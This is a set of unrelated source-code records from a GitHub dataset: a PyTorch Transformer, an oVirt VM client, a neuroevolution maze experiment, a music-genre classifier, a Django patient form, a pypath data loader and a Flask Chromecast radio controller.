__init__(self, head=8, embedding_dim=512, p_dropout=0.1):\n        super().__init__()\n        # the number of heads must evenly divide the embedding dimension\n        assert embedding_dim % head == 0\n\n        # per-head embedding dimension\n        self.d_k = embedding_dim // head\n        self.head = head\n        self.embedding_dim = embedding_dim\n\n        # four linear layers: the Q, K and V projections plus the final output projection\n        self.linears = clone_modules(nn.Linear(embedding_dim, embedding_dim), 4)\n\n        # placeholder for the attention weights\n        self.attn = None\n\n        # dropout\n        self.dropout = nn.Dropout(p=p_dropout)\n\n    def forward(self, query, key, value, mask=None):\n        # apply the mask if one is given\n        if mask is not None:\n            # add a head dimension so the mask broadcasts over all heads\n            mask = mask.unsqueeze(0)\n\n        # number of samples in this batch\n        batch_size = query.size(0)\n\n        # view splits Q, K and V into heads; that layout alone cannot be fed to attention\n        # in parallel, but swapping the head and word dimensions lets every head\n        # compute its attention independently\n        query, key, value = \\\n            [model(x).view(batch_size, -1, self.head, self.d_k).transpose(1, 2)\n             for model, x in zip(self.linears, (query, key, value))]\n\n        # run scaled dot-product attention over all heads at once\n        x, self.attn = attention(query, key, value, mask=mask, dropout=self.dropout)\n\n        
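# x is (batch_size, head, seq_len, d_k) here and self.attn holds the per-head attention weights\n        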
# merge the heads back: transpose to (batch, seq_len, head, d_k), then view it as d_model again\n        x = x.transpose(1, 2).contiguous().view(batch_size, -1, self.embedding_dim)\n\n        # the final output goes through one more linear projection\n        return self.linears[-1](x)\n\nclass PositionwiseFeedForward(nn.Module):\n    \"\"\"\n    position-wise feed-forward layer\n    return linear(dropout(relu(linear(x))))\n    \"\"\"\n    def __init__(self, d_model, d_ff, p_dropout=0.1):\n        super().__init__()\n        self.f1 = nn.Linear(d_model, d_ff)\n        self.f2 = nn.Linear(d_ff, d_model)\n        self.dropout = nn.Dropout(p=p_dropout)\n\n    def forward(self, x):\n        return self.f2(self.dropout(F.relu(self.f1(x))))\n\nclass LayerNorm(nn.Module):\n    \"\"\"\n    normalizes the last feature dimension of each single sample in a batch,\n    avoiding the variable-length problems BatchNorm runs into in NLP\n    \"\"\"\n    def __init__(self, features_size, eps=1e-6):\n        super().__init__()\n        self.train_mean = nn.Parameter(torch.ones(features_size))\n        self.train_std = nn.Parameter(torch.zeros(features_size))\n        self.eps = eps\n    def forward(self, x):\n        mean = x.mean(-1, keepdim=True)\n        std = x.std(-1, keepdim=True)\n        return (x - mean) / (std + self.eps) * self.train_mean + self.train_std\n\nclass SublayerConnection(nn.Module):\n    \"\"\"\n    residual connection around a sub-layer, following the model diagram\n    \"\"\"\n    def __init__(self, size, p_dropout=0.1):\n        super().__init__()\n        self.norm = LayerNorm(size)\n        self.dropout = nn.Dropout(p=p_dropout)\n\n    def forward(self, x, sublayer):\n        # while reproducing the paper, applying self.norm inside the residual worked better than outside\n        return x + self.dropout(sublayer(self.norm(x)))\n\nclass EncoderLayer(nn.Module):\n    def __init__(self, d_model, attn_layer, feed_forward_layer, dropout):\n        super().__init__()\n        self.d_model = d_model\n        self.attn = attn_layer\n        self.feed_forward = feed_forward_layer\n\n        # two residual sub-layer connections are needed as well\n        self.subLayers = clone_modules(SublayerConnection(d_model, dropout), 2)\n\n    def forward(self, x, mask):\n        # multi-head attention with a residual, then the feed-forward layer with another residual\n        x = self.subLayers[0](x, lambda x : self.attn(x, x, x, mask))\n        return self.subLayers[1](x, self.feed_forward)\n\nclass Encoder(nn.Module):\n    def __init__(self, layer, N):\n        super().__init__()\n        self.norm = LayerNorm(layer.d_model)\n        self.layers = clone_modules(layer, N)\n\n    def forward(self, x, mask):\n        for layer in self.layers:\n            x = layer(x, mask)\n        return self.norm(x)\n\nclass DecoderLayer(nn.Module):\n    def __init__(self, d_model, self_attn, src_attn, feed_forward, p_dropout) -> None:\n        super().__init__()\n        # self_attn is the masked self-attention, src_attn attends over the encoder output\n        self.d_model = d_model\n        self.self_attn = self_attn\n        self.src_attn = src_attn\n        self.ff = feed_forward\n        self.subLayers = clone_modules(SublayerConnection(d_model, p_dropout), 3)\n\n    def forward(self, x, m, src_mask, tgt_mask):\n        \"\"\"\n        x: output of the previous layer, m (memory): encoder output,\n        src_mask: source-data mask, tgt_mask: target-data mask\n        \"\"\"\n        # step 1: the decoder input attends to itself; already-emitted words must not attend\n        # to later words, because the full target sequence is fed in at once so the loss\n        # can be computed in parallel\n        x = self.subLayers[0](x, lambda x : self.self_attn(x, x, x, tgt_mask))\n        # step 2: the self-attention result attends over the encoder's final output;\n        # src_mask here is not about preventing information leakage - it masks characters that\n        # carry no meaning for the result (e.g. padding), improving quality and training speed\n        x = self.subLayers[1](x, lambda x : self.src_attn(x, m, m, src_mask))\n\n        return self.subLayers[2](x, self.ff)\n\nclass Decoder(nn.Module):\n    def __init__(self, layer, N):\n        super().__init__()\n        self.norm = LayerNorm(layer.d_model)\n        self.layers = clone_modules(layer, N)\n\n    def forward(self, x, m, src_mask, tgt_mask):\n        for layer in self.layers:\n            x = layer(x, m, src_mask, tgt_mask)\n\n        return self.norm(x)\n\nclass Generator(nn.Module):\n    def __init__(self, d_model, vocab_size) -> None:\n        super().__init__()\n        self.project = nn.Linear(d_model, vocab_size)\n\n    def forward(self, x):\n        # log_softmax and softmax give the same final prediction,\n        # but log_softmax avoids softmax's numerical instability\n        return F.log_softmax(self.project(x), -1)\n\n
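# a rough end-to-end usage sketch (assumed example, not part of the original file):\n#   model = make_model(src_vocab=1000, tgt_vocab=1000)\n#   memory = model.encode(src, src_mask)\n#   out = model.decode(memory, src_mask, tgt, subsequent_mask(tgt.size(1)))\n#   log_probs = model.generator(out)\n\n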
class EncoderDecoder(nn.Module):\n    def __init__(self, encoder, decoder, src_embed, tgt_embed, generator):\n        super().__init__()\n        self.encoder = encoder\n        self.decoder = decoder\n        self.src_embed = src_embed\n        self.tgt_embed = tgt_embed\n        self.generator = generator\n\n    def forward(self, src, tgt, src_mask, tgt_mask):\n        return self.generator(\n            self.decode(\n                self.encode(src, src_mask), src_mask, tgt, tgt_mask))\n\n    def encode(self, src, src_mask):\n        return self.encoder(self.src_embed(src), src_mask)\n\n    def decode(self, m, src_mask, tgt, tgt_mask):\n        return self.decoder(self.tgt_embed(tgt), m, src_mask, tgt_mask)\n\n# build the complete transformer model\ndef make_model(src_vocab, tgt_vocab, N=6,\n               d_model=512, d_ff=2048, head=8, p_dropout=0.1):\n    # create the shared layers once and deepcopy them below\n    attn = MultiHeadedAttention(head, d_model)\n    ff = PositionwiseFeedForward(d_model, d_ff, p_dropout)\n    pos_layer = PositionEmbedding(d_model, p_dropout)\n\n    # assemble the model\n    model = EncoderDecoder(\n        Encoder(EncoderLayer(d_model, c(attn), c(ff), p_dropout), N),\n        Decoder(DecoderLayer(d_model, c(attn), c(attn), c(ff), p_dropout), N),\n        nn.Sequential(Embedding(d_model, src_vocab), c(pos_layer)),\n        nn.Sequential(Embedding(d_model, tgt_vocab), c(pos_layer)),\n        Generator(d_model, tgt_vocab)\n    )\n\n    # explicitly initialize every parameter with more than one dimension\n    # from a Xavier uniform distribution\n    for p in model.parameters():\n        if p.dim() > 1:\n            nn.init.xavier_uniform_(p)\n\n    return model","repo_name":"Shaohu-Li/Learn-Transformer","sub_path":"transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":12485,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41301459260","text":"from ovirtsdk.api import API\nfrom ovirtsdk.infrastructure.errors \\\n    import NoCertificatesError, RequestError, ConnectionError\n\napi = None\n\n\nclass OvirtApi(object):\n    def login(self, url, username, password, ca_file):\n        global api\n        try:\n            api = API(url=url,\n                      username=username,\n                      password=password,\n                      ca_file=ca_file)\n        except RequestError as reqErr:\n            return False, \"Login error\"\n        except ConnectionError as conErr:\n            return False, \"Bad URL\"\n        except NoCertificatesError as certErr:\n            return False, \"SSL error. 
Use 'http(s)://'\"\n except Exception as e:\n return False, str(e)\n return True, ''\n\n def getUserVms(self):\n global api\n return api.vms.list()\n\n def getVmById(self, id):\n global api\n return api.vms.get(id=id)\n\n def getVmStatus(self, id):\n global api\n return api.vms.get(id=id).status.state\n\n def startVm(self, vmid):\n global api\n try:\n api.vms.get(id=vmid).start()\n except RequestError as reqErr:\n return False, reqErr.reason, reqErr.detail\n except ConnectionError as conErr:\n return False, 'Connection Error'\n return True, None, None\n\n def stopVm(self, vmid):\n global api\n try:\n api.vms.get(id=vmid).stop()\n except RequestError as reqErr:\n return False, reqErr.reason, reqErr.detail\n except ConnectionError as conErr:\n return False, 'Connection Error'\n return True, None, None\n\n def ticketVm(self, vmid):\n global api\n try:\n ticket = api.vms.get(id=vmid).ticket()\n value = ticket.get_ticket().get_value()\n expiry = ticket.get_ticket().get_expiry()\n return value, expiry\n except RequestError as reqErr:\n raise Exception(reqErr.reason, reqErr.detail)\n except ConnectionError as conErr:\n raise Exception('Connection Error', '')\n","repo_name":"oVirt/samples-portals","sub_path":"python-gtk/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27417847340","text":"import click\nimport multiprocessing\nimport os\n\nimport numpy as np\n\nimport t_maze_env\nfrom neuroevolution.activation_functions import tanh_act\nfrom neuroevolution.adaptive_linear import AdaptiveLinearNetwork\nfrom neuroevolution.config import Config\nfrom neuroevolution.genome import DefaultGenome\nfrom neuroevolution.multienv_eval import MultiEnvEvaluator\nfrom neuroevolution.population import Population\nfrom neuroevolution.reporting import LogReporter, StatisticsReporter, StdOutReporter\nfrom neuroevolution.reproduction import DefaultReproduction\nfrom neuroevolution.species import DefaultSpeciesSet\nfrom neuroevolution.stagnation import DefaultStagnation\n\nbatch_size = 4\nDEBUG = True\n\n\ndef make_net(genome, config, _batch_size):\n input_coords = [[-1.0, 0.0], [0.0, 0.0], [1.0, 0.0], [0.0, -1.0]]\n output_coords = [[-1.0, 0.0], [0.0, 0.0], [1.0, 0.0]]\n return AdaptiveLinearNetwork.create(\n config,\n genome,\n in_coords=input_coords,\n out_coords=output_coords,\n weights_threshold=0.4,\n batch_size=_batch_size,\n activation=tanh_act,\n out_activation=tanh_act,\n device=\"cpu\",\n )\n\ndef activate_net(net, states, debug=False, step_num=0):\n if debug and step_num == 1:\n print(\"\\n\" + \"=\" * 20 + \" DEBUG \" + \"=\" * 20)\n print(net.delta_w_node)\n print(\"W init: \", net.in2out[0])\n outputs = net.activate(states).numpy()\n if debug and (step_num - 1) % 100 == 0:\n print(\"\\nStep {}\".format(step_num - 1))\n print(\"Outputs: \", outputs[0])\n print(\"Delta W: \", net.delta_w[0])\n print(\"W: \", net.in2out[0])\n return np.argmax(outputs, axis=1)\n\n\n@click.command()\n@click.option(\"--n_generations\", type=int, default=10000)\n@click.option(\"--n_processes\", type=int, default=1)\ndef run(n_generations, n_processes):\n # Load the config file, which is assumed to live in\n # the same directory as this script.\n config_path = os.path.join(os.path.dirname(__file__), \"t_maze.cfg\")\n config = Config(DefaultGenome, DefaultReproduction, DefaultSpeciesSet,\n DefaultStagnation, config_path)\n\n envs = [t_maze_env.TMazeEnv(init_reward_side=i, n_trials=100) 
for i in [1, 0, 1, 0]]\n\n evaluator = MultiEnvEvaluator(make_net, activate_net, envs=envs,\n batch_size=batch_size, max_env_steps=1000\n )\n\n if n_processes > 1:\n pool = multiprocessing.Pool(processes=n_processes)\n\n def eval_genomes(genomes, config):\n fitnesses = pool.starmap(evaluator.eval_genome,\n ((genome, config) for _, genome in genomes))\n for (_, genome), fitness in zip(genomes, fitnesses):\n genome.fitness = fitness\n\n else:\n\n def eval_genomes(genomes, config):\n for i, (_, genome) in enumerate(genomes):\n try:\n genome.fitness = evaluator.eval_genome(genome, config,\n debug=DEBUG and i % 100 == 0)\n except Exception as e:\n print(genome)\n raise e\n\n pop = Population(config)\n stats = StatisticsReporter()\n pop.add_reporter(stats)\n reporter = StdOutReporter(True)\n pop.add_reporter(reporter)\n logger = LogReporter(\"log.json\", evaluator.eval_genome)\n pop.add_reporter(logger)\n\n winner = pop.run(eval_genomes, n_generations)\n\n print(winner)\n final_performance = evaluator.eval_genome(winner, config)\n print(\"Final performance: {}\".format(final_performance))\n generations = reporter.generation + 1\n return generations\n\n\nif __name__ == \"__main__\":\n run() # pylint: disable=no-value-for-parameter\n","repo_name":"inigo-irigaray/NEAT-neuroevolution-pytorch","sub_path":"t_maze.py","file_name":"t_maze.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19724657160","text":"import pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nimport tensorflow as tf\r\n\r\ndef mis_classified(original, predicted):\r\n # Counting the number of values that has been mis-classified \r\n value = 0\r\n for i in range(len(original)):\r\n if(original[i]!=predicted[i]):\r\n value+=1\r\n return value\r\n\r\n\r\ndef print_metrics(data, error, missed = 0):\r\n # Printing the error and the number of the values that has been misclassified\r\n print(\"\\t\", data)\r\n print(\"\\t\\t Mean Squared Error:\", error)\r\n print(\"\\t\\t Missed value:\", missed)\r\n\r\n\r\ndef process_data():\r\n # Reading the file\r\n audio_data = pd.read_csv(\"audio_data.csv\")\r\n audio_data.drop(['Unnamed: 0'], inplace=True, axis = 1)\r\n\r\n # Checking the file\r\n # audio_data.head()\r\n\r\n # audio_data.describe()\r\n\r\n # Checking if there is any null value\r\n # audio_data.isnull.sum()\r\n\r\n # Encoding the \"genre_top\" as 0 and 1\r\n encoder = LabelEncoder()\r\n audio_data[\"genre_top\"] = encoder.fit_transform(audio_data[\"genre_top\"])\r\n # It labels Hip_Hop as zero and Rock as One\r\n\r\n # finding the co-relation for Feature Selection\r\n audio_data_features = audio_data[audio_data.columns[:-1]]\r\n corelation = audio_data_features.corr()\r\n\r\n # Plotting the co-relation on a graph\r\n sns.heatmap(corelation, annot= True)\r\n\r\n # we will drop the columns that have more then 70% corelation\r\n corr = set()\r\n threshold = 0.7\r\n for i in range(len(corelation)):\r\n for j in range(len(corelation)):\r\n if abs(corelation.iloc[i,j])>threshold and corelation.iloc[i,j]!=1:\r\n 
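# remember the column name so strongly co-linear features could be dropped later\r\n                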
corr.add(corelation.columns[i])\r\n    # print(corr)\r\n    # As the set is empty, we get to know that there is no strong relationship in the features.\r\n\r\n    X = audio_data_features\r\n    y = audio_data[\"genre_top\"]\r\n\r\n    # Now, our data is ready for the train test splitting\r\n    X_train, X_ , y_train , y_ = train_test_split(X, y , train_size=0.6, random_state=42)\r\n    X_cv, X_test, y_cv, y_test = train_test_split(X_, y_ , train_size=0.5, random_state=42)\r\n\r\n    # Scaling the Data\r\n    scaler = StandardScaler()\r\n    X_train = scaler.fit_transform(X_train)\r\n    X_cv = scaler.transform(X_cv)\r\n    X_test = scaler.transform(X_test)\r\n\r\n    y_train = np.array(y_train)\r\n    y_cv = np.array(y_cv)\r\n    y_test = np.array(y_test)\r\n\r\n    return X_test, y_test, X_cv, y_cv, X_train, y_train\r\n\r\ndef Prediction_Model():\r\n\r\n    X_test, y_test, X_cv, y_cv, X_train, y_train = process_data()\r\n\r\n    # Using Different Algorithms to predict the data\r\n    logistic_Regression = LogisticRegression()\r\n    GuassianNB = GaussianNB()\r\n    kneighbours = KNeighborsClassifier(n_neighbors=10)\r\n    Decision_Tree = DecisionTreeClassifier()\r\n    ml_Algorithms = [logistic_Regression, GuassianNB, Decision_Tree, kneighbours]\r\n\r\n    file = open(\"result.txt\", \"w\")\r\n    for i in ml_Algorithms:\r\n        model = i\r\n        model.fit(X_train, y_train)\r\n        y_pred = model.predict(X_train)\r\n        error1 = mean_squared_error(y_train, y_pred)\r\n        missed1 = mis_classified(y_train, y_pred)\r\n\r\n        y_pred = model.predict(X_cv)\r\n        error2 = mean_squared_error(y_cv, y_pred)\r\n        missed2 = mis_classified(y_cv, y_pred)\r\n\r\n        y_pred = model.predict(X_test)\r\n        error3 = mean_squared_error(y_test, y_pred)\r\n        missed3 = mis_classified(y_test, y_pred)\r\n\r\n        print(i,\":\")\r\n        print_metrics(\"Training data\", error1, missed1)\r\n        print_metrics(\"Cross_Validation data\", error2, missed2)\r\n        print_metrics(\"Testing data\", error3, missed3)\r\n        file.write(f\"{i}\\n{error1} {error2} {error3} {missed1} {missed2} {missed3} \\n\")\r\n        print(\"\\n\\n\")\r\n\r\n    data = X_train\r\n    # Using a Neural Network to predict the song\r\n    model = tf.keras.Sequential([\r\n        tf.keras.Input((None, 2881, 9)),\r\n        tf.keras.layers.Dense(units=1000, activation=\"relu\"),\r\n        tf.keras.layers.Dense(units=500, activation=\"relu\"),\r\n        tf.keras.layers.Dense(units=100, activation=\"relu\"),\r\n        tf.keras.layers.Dense(units=1, activation=\"sigmoid\")]\r\n    )\r\n\r\n    model.compile(optimizer='adam',\r\n                  loss=tf.keras.losses.BinaryCrossentropy())\r\n\r\n    history = model.fit(X_train, y_train, epochs=100)\r\n\r\n    y_pred = model.predict(X_train)\r\n    error1 = mean_squared_error(y_train, y_pred)\r\n    missed1 = mis_classified(y_train, y_pred)\r\n\r\n    y_pred = model.predict(X_cv)\r\n    error2 = mean_squared_error(y_cv, y_pred)\r\n    missed2 = mis_classified(y_cv, y_pred)\r\n\r\n    y_pred = model.predict(X_test)\r\n    error3 = mean_squared_error(y_test, y_pred)\r\n    missed3 = mis_classified(y_test, y_pred)\r\n\r\n    print(\"Neural Network\",\":\")\r\n    print_metrics(\"Training data\", error1, missed1)\r\n    print_metrics(\"Cross_Validation data\", error2, missed2)\r\n    print_metrics(\"Testing data\", error3, missed3)\r\n    file.write(f\"Neural Network\\n{error1} {error2} {error3} {missed1} {missed2} {missed3} \\n\")\r\n\r\n    file.close()\r\n\r\ndef final_algorithm():\r\n    # After analyzing all the models, KNeighborsClassifier seems to be the most suitable one\r\n    X_test, y_test, X_cv, y_cv, X_train, y_train = process_data()\r\n    kneighbours = KNeighborsClassifier(n_neighbors=10)\r\n    model = kneighbours\r\n    model.fit(X_train, 
y_train)\r\n return model\r\n\r\nif __name__==\"__main__\":\r\n Prediction_Model()","repo_name":"anamfatima1304/Songs_Prediction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18771340149","text":"from django.shortcuts import redirect, render\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.contrib.messages import constants\nfrom . models import Pacientes\n\n\n@login_required(login_url='/auth/logar/')\ndef pacientes(request):\n if request.method == \"GET\":\n pacientes = Pacientes.objects.filter(nutri = request.user)\n return render(request, 'pacientes.html', {'pacientes': pacientes})\n elif request.method == \"POST\":\n nome = request.POST.get('nome')\n sexo = request.POST.get('sexo')\n idade = request.POST.get('idade')\n email = request.POST.get('email')\n telefone = request.POST.get('telefone')\n\n if (len(nome.strip()) == 0) or (len(sexo.strip()) == 0) or (len(email.strip()) == 0) or (len(idade.strip()) == 0) or (len(telefone.strip()) == 0):\n messages.add_message(request, constants.ERROR, 'Preencha todos os campos!')\n return redirect('/pacientes/')\n \n \n if not idade.isnumeric():\n messages.add_message(request, constants.ERROR, 'Digite uma idade válida')\n return redirect('/pacientes/')\n\n pacientes = Pacientes.objects.filter(email=email)\n\n if pacientes.exists():\n messages.add_message(request, constants.ERROR, 'Já existe um paciente com esse E-mail.')\n return redirect('/pacientes/')\n \n try:\n paciente = Pacientes(nome=nome,\n sexo=sexo,\n idade=idade,\n email=email,\n telefone=telefone,\n nutri=request.user)\n \n paciente.save()\n messages.add_message(request, constants.SUCCESS, 'Paciente cadastrado com sucesso!') \n return redirect('/pacientes/')\n except:\n messages.add_message(request, constants.ERROR, 'Erro interno do sistema!')\n return redirect('/pacientes/')\n\n\n\n ","repo_name":"Maia1111/PythonFull_Nutrilab","sub_path":"plataforma/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70278584429","text":"import csv\nimport collections\n\nimport pypath.share.curl as curl\nimport pypath.resources.urls as urls\nimport pypath.utils.mapping as mapping\nimport pypath.share.common as common\n\n\nLrdbAnnotation = collections.namedtuple(\n 'LrdbAnnotation',\n [\n 'role',\n 'cell_type',\n 'sources',\n 'references',\n ],\n)\n\n\ndef lrdb_interactions():\n\n resource_names = {\n 'reactome': 'Reactome',\n 'fantom5': 'Fantom5',\n 'IUPHAR': 'Guide2Pharma',\n 'uniprot': 'UniProt',\n }\n\n def remove(lst, to_remove):\n to_remove = common.to_set(to_remove)\n\n return [\n it\n for it in lst\n if it not in to_remove\n ]\n\n LrdbRecord = collections.namedtuple(\n 'LrdbRecord',\n [\n 'ligand_genesymbol',\n 'receptor_genesymbol',\n 'sources',\n 'references',\n 'ligand_cells',\n 'receptor_cells',\n ]\n )\n\n url = urls.urls['lrdb']['url']\n\n c = curl.Curl(url, silent = False, large = True)\n\n reader = csv.DictReader(c.result, delimiter = '\\t')\n\n result = []\n\n for rec in reader:\n\n result.append(\n LrdbRecord(\n ligand_genesymbol = rec['ligand'],\n receptor_genesymbol = rec['receptor'],\n sources = [\n resource_names[src] if src in resource_names else src\n for src in\n remove(\n rec['source'].split(','),\n 
{'literature', ''},\n )\n ],\n references = remove(rec['PMIDs'].split(','), ''),\n ligand_cells = remove(rec['cells.L'].split(','), ''),\n receptor_cells = remove(rec['cells.R'].split(','), ''),\n )\n )\n\n return result\n\n\ndef lrdb_annotations():\n\n result = collections.defaultdict(set)\n\n lrdb = lrdb_interactions()\n\n for rec in lrdb:\n\n for role in ('ligand', 'receptor'):\n\n uniprots = mapping.map_name(\n getattr(rec, '%s_genesymbol' % role),\n 'genesymbol',\n 'uniprot',\n )\n\n for uniprot in uniprots:\n\n cell_types = getattr(rec, '%s_cells' % role) or (None,)\n\n for cell_type in cell_types:\n\n cell_type = (\n 'T lymphocyte'\n if cell_type == 'tymphocyte' else\n cell_type.replace('cells', 'cell')\n if cell_type else\n None\n )\n\n result[uniprot].add(\n LrdbAnnotation(\n role = role,\n cell_type = cell_type,\n sources = tuple(sorted(rec.sources)),\n references = tuple(sorted(rec.references)),\n )\n )\n\n return dict(result)\n","repo_name":"saezlab/pypath","sub_path":"pypath/inputs/lrdb.py","file_name":"lrdb.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"17556560362","text":"import pychromecast\nfrom time import sleep\nfrom flask import Flask, request, render_template\n\nCHROMECAST_FRIENDLY_NAME = \"\"\n\n\nclass Queue:\n def __init__(self):\n self.queue = []\n\n def addFunc(self, func):\n if self.queue and self.queue[-1] == func:\n return\n else:\n self.queue.append(func)\n\n def tryExecute(self): #doesnt have check if execution fails\n if self.queue:\n self.queue.pop(0)()\n \n def not_empty(self):\n return bool(self.queue)\n\nclass Listener:\n def __init__(self, mediaFunc=None, connectionFunc=None):\n self.mediaFunc = mediaFunc\n self.connectionFunc = connectionFunc\n\n def new_media_status(self, data):\n if self.mediaFunc is not None:\n self.mediaFunc(data)\n\n def new_connection_status(self, data):\n if self.connectionFunc is not None:\n self.connectionFunc(data)\n\nclass Chromecast:\n def __init__(self, device):\n self.device = device\n self.cast = None\n self.mc = None\n self.chromecasts = None\n self.browser = None\n self.url = None\n self.newUrl = False\n self.isProcessing = False\n self.turnBackOn = False\n self.expectedStatus = \"UNKNOWN\"\n self.commandQueue = Queue()\n self.listener = Listener(self.new_media_status_handler, self.new_connection_status_handler)\n self.connect()\n\n #RANDOM FUNCTIONS\n def waitUntilTrue(self, variable, timeout, period):\n while not eval(variable) and timeout > 0:\n timeout -= period\n sleep(period)\n\n\n #LISTENER HANDLER\n def new_media_status_handler(self, data):\n print(\"NEW STATUS: \", data.player_state)\n\n def new_connection_status_handler(self, data):\n print(\"NEW CONNECTION STATUS: \", data)\n \n #Turn back on after disconnect\n if self.cast is not None:\n if self.turnBackOn and data.status == \"CONNECTED\":\n self.turnBackOn = False\n self.connect()\n self.play()\n\n if data.status == \"LOST\" and self.expectedStatus == \"PLAYING\":\n self.turnBackOn = True\n\n\n #CHROMECAST\n def connect(self, tries=0):\n if self.isProcessing:\n return\n\n self.processing(True)\n try:\n self.disconnect()\n except:\n print(\"disconnect unsuccessful\")\n chromecasts, self.browser = pychromecast.get_listed_chromecasts(friendly_names=[self.device])\n print(chromecasts)\n if not chromecasts:\n print(f'No chromecast with name \"{self.device}\" discovered {tries + 1}')\n tries += 1\n if tries > 5:\n self.processing(False)\n return\n 
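# clear the busy flag before recursing, otherwise the guard at the top of connect() would skip the retry\n            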
self.processing(False)\n self.connect(tries=tries)\n return\n\n self.cast = chromecasts[0]\n self.cast.wait()\n print('Chromecast ready')\n self.mc = self.cast.media_controller\n self.cast.socket_client.register_connection_listener(self.listener)\n self.mc.register_status_listener(self.listener)\n self.processing(False)\n\n def setMedia(self):\n if self.isProcessing:\n return\n\n if self.checkConnection() and self.url is not None:\n self.processing(True)\n self.newUrl = False\n \n self.mc.play_media(self.url, 'audio/mp3', stream_type=\"LIVE\", autoplay=False)\n self.mc.block_until_active()\n print(\"Trying to play: \", self.url)\n\n if self.mc.status.player_is_paused:\n self.waitUntilTrue('self.mc.status.player_is_idle', 15, 0.01)\n \n self.waitUntilTrue('self.mc.status.player_is_paused', 30, 0.01)\n print(\"UNBLOCKED\")\n self.processing(False)\n\n def processing(self, bool):\n if bool:\n self.isProcessing = True\n else:\n self.isProcessing = False\n\n def checkConnection(self):\n if self.cast is None:\n self.connect()\n\n if self.cast.socket_client.is_stopped:\n print('No chromecast connected, trying to connect')\n self.connect()\n if self.cast.socket_client.is_stopped:\n print('Connection unsuccessful')\n return False\n return True\n \n def checkMedia(self):\n if self.mc is None:\n return False\n\n if self.mc.status.player_state == \"UNKNOWN\" or self.mc.status.player_is_idle or self.newUrl:\n print('No or new media, setting up')\n self.setMedia()\n if self.mc.status.player_state == \"UNKNOWN\":\n print('media setup unsuccessful')\n return False\n return True\n\n def checkProcessing(self, command=None):\n if self.isProcessing:\n if command is not None:\n self.commandQueue.addFunc(command)\n return True\n return False\n\n def checkAll(self, command=None):\n processing = self.checkProcessing(command)\n if processing:\n return False\n\n return self.checkConnection() and self.checkMedia()\n\n\n def setUrl(self, url):\n if self.url != url:\n self.url = url\n self.newUrl = True\n\n #chromecast control functions\n def pause(self):\n if self.checkAll(self.pause):\n print('pausingg')\n self.mc.pause()\n self.expectedStatus = \"PAUSED\"\n self.commandQueue.tryExecute()\n \n def play(self):\n self.newUrl = True #to always set new media and so radio is live\n if self.checkAll(self.play):\n self.mc.play()\n self.expectedStatus = \"PLAYING\"\n self.commandQueue.tryExecute()\n\n def stop(self):\n if self.checkAll(self.stop):\n self.mc.stop()\n self.expectedStatus = \"IDLE\"\n self.commandQueue.tryExecute()\n\n def setVolume(self, value):\n if self.checkAll():\n self.cast.set_volume(value/100)\n #after disconnect doesnt resume playback (not implemented)\n\n def disconnect(self):\n self.cast.disconnect()\n\n def connectNew(self):\n self.connect()\n\n\n def is_playing(self):\n if self.checkConnection():\n self.waitUntilTrue('self.mc.status.player_state != \"UNKNOWN\"', 2, 0.01)\n if self.mc.status.player_is_playing:\n return True\n return False\n\n def get_url(self):\n return self.url\n \n def get_volume(self):\n if self.checkConnection():\n return self.cast.status.volume_level\n return -1\n\n\n#FLASK\napp = Flask(\"SmartHomeRadio\")\n\n@app.route(\"/\")\ndef index():\n return render_template('RadioGui.html')\n\n@app.route(\"/chromecast\", methods=[\"POST\"])\ndef ajax():\n action = request.form.get('action')\n print(f'{action} command received')\n\n if action == 'url':\n chromecast.setUrl(request.form.get('url'))\n \n elif action == 'play':\n chromecast.play()\n \n elif action == 'pause':\n 
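# like play and stop, pause is queued by Chromecast.checkAll when the client is busy\n        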
chromecast.pause()\n\n elif action == 'stop':\n chromecast.stop()\n\n elif action == 'volume':\n chromecast.setVolume(float(request.form.get(\"value\")))\n\n elif action == 'disconnect':\n chromecast.disconnect()\n\n elif action == 'connect':\n chromecast.connectNew()\n\n else:\n return ('Bad Data', 400)\n\n print('')\n return \"Success\"\n\n@app.route(\"/setup\", methods=[\"GET\"])\ndef setup():\n data = {\n \"is_playing\": chromecast.is_playing(),\n \"url\": chromecast.get_url(),\n \"volume\": round(chromecast.get_volume()*100)}\n return data\n\n\n#OTHER\nchromecast = Chromecast(CHROMECAST_FRIENDLY_NAME)\n\n\n# \"Audio-Pracovna\" \n# 'https://stream.funradio.sk:18443/fun192.mp3'\n# 'https://stream.bauermedia.sk/rock-hi.mp3'\n# 'https://stream.bauermedia.sk/europa2-hi.mp3?aw_0_req.gdpr=false'\n# 'http://commondatastorage.googleapis.com/gtv-videos-bucket/sample/SubaruOutbackOnStreetAndDirt.mp4'\n# 'http://commondatastorage.googleapis.com/gtv-videos-bucket/sample/ForBiggerFun.mp4'","repo_name":"staudyy/SmartHomeRadio","sub_path":"chromecastServer.py","file_name":"chromecastServer.py","file_ext":"py","file_size_in_byte":8147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6903649169","text":"# -*- coding: utf-8 -*-\n#单隐层网络\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom 